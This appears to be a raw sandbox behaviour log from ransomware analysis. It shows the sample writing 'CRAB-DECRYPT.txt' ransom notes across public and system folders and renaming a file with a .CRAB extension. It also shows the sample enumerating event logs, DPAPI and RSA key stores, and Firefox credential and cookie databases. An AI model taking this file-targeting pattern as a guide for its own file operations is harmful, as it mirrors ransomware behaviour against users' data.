Create C:\Users\Public\Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Documents\My Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\Public\Libraries\RecordedTV.library-ms.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\Public\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Public\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\2052\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\dll1\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\dll2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\amd64\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\i386\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\ux\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Create Pipe Anonymous read pipe size = 0 True 1
Fn
Get Info C:\MalwarebytesLABs type = file_attributes False 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe type = size True 1
Fn
Get Info C:\588bce7c90097ed212\netfx_Core_x64.msi type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\netfx_Core_x86.msi type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\netfx_Extended.mzz type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\netfx_Extended_x64.msi type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\netfx_Extended_x86.msi type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\ParameterInfo.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\RGB9RAST_x64.msi type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\RGB9Rast_x86.msi type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\SetupUi.xsd type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\SplashScreen.bmp type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\Strings.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\UiInfo.xml type = file_attributes True 1
Fn
Get Info C:\588bce7c90097ed212\watermark.bmp type = file_attributes True 1
Fn
Get Info C:\bootmgr type = file_attributes True 1
Fn
Get Info C:\Logs\Application.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\HardwareEvents.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Internet Explorer.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Key Management Service.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppReadiness%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppReadiness%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-International%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Known Folders API Service.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-LiveId%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-MUI%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-MUI%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-NCSI%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Ntfs%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Ntfs%4WHC.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SettingSync%4Debug.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SettingSync%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SMBClient%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SmbClient%4Security.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SMBServer%4Audit.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SMBServer%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-SMBServer%4Security.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Store%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-TWinUI%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-Winlogon%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Security.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Setup.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\System.evtx type = file_attributes True 1
Fn
Get Info C:\Logs\Windows PowerShell.evtx type = file_attributes True 1
Fn
Get Info C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT.LOG1 type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT.LOG2 type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\Default\NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\02QNH7-.m4a type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\2oUNrYIA3zn9-w8eBm_.swf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\9b_EQebyn-_mWdpXc6.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\agGHfzYqqx.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\AhWG4Et.avi type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\cZ7CzOo.swf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\DX12g0.flv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\DxoEAnru.m4a type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\e6N3L.bmp type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\elVartYShnl.odp type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\eo4d2qL.wav type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\fiIX7K.bmp type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\g6-JFVm7lu6U9x3fZ.wav type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\heJjGiHHExhzv.wav type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Ja SFgovZVYsq.gif type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Jw08Q7.flv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\XCVUDUNH\#AppContainer\aa.online-metrix.net\fpc.swf\session.sol type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#aa.online-metrix.net\settings.sol type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\MbKHyQXBm8.png type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\AccessCache.accdb type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Access\System.mdw type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1051304884-625712362-2192934891-1000\83aa4cc77f591dfc2374580bbd95f6ba_33d770d0-06bc-47c5-8714-222cdac43a71 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\MS Project\16\en-US\Global.MPT type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\MSO1033.acl type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\con2.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Database1.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Database2.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Documents.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Global.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\index.dat type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\sample_file.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.srs type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Outlook\Outlook.xml type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\CREDHIST type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\5c218343-f813-4ba1-8332-5b3fa0f5717a type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\7a70842e-d6a2-46c1-966c-384a4ef9d347 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\e01a7a31-687e-4cfa-9cfe-700ac08104e6 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\S-1-5-21-1051304884-625712362-2192934891-1000\Preferred type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Protect\SYNCHIST type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Normal.dotm type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\Welcome to Excel.xltx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\Templates\~$Normal.dotm type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20170824053622 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\compatibility.ini type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\crashes\store.json.mozlz4 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\archived\2017-12\1513694905834.da7c9676-f8c5-46e7-a28d-350079b8e30e.main.jsonlz4 type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\session-state.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\datareporting\state.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-gmpopenh264\1.6\gmpopenh264.info type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\manifest.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat type = file_attributes True 1
Fn
